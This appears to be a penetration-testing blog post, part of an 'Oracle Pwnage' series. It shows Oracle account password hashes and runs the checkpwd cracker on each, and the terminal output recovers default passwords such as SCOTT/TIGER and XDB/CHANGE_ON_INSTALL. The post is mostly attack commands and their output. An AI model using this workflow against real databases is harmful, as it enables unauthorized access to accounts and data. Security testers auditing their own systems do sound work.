Oracle Pwnage Part 3
Posted by CG
Sorry no metasploit for this one.
But
I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm
Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:
[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF
There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html
cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] – (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com
opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP
Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1
cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] – (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com
opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER
Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5
cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] – (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com
opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL
Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5
